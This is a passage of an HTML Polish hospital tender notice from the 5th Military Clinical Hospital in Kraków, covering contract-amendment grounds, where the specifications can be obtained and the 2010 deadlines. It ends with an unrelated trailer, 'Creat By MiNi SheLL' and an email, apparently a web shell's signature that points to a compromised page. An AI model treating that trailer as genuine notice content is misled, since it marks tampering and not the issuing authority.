-	zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia
-	omyłek pisarskich lub błędów rachunkowych,
-	mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami,
-	jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego
-	 innych zmian korzystnych dla Zamawiającego, w tym polegających na zamianie elementów zamówienia na elementy o lepszych lub/i odpowiedniejszych parametrach technicznych chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.5wszk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SEKCJA ZAMÓWIEŃ PUBLICZNYCH 5 WOJSKOWEGO SZPITALA KLINICZNEGO SP ZOZ UL. WROCŁAWSKA 1-3; 30-901 KRAKÓW.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.11.2010 godzina 11:00, miejsce: KANCELARIA 5 WOJSKOWEGO SZPITALA KLINICZNEGO SP ZOZ ( BUDYNEK KOMENDY) UL. WROCŁAWSKA 1-3; 30-901 KRAKÓW.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com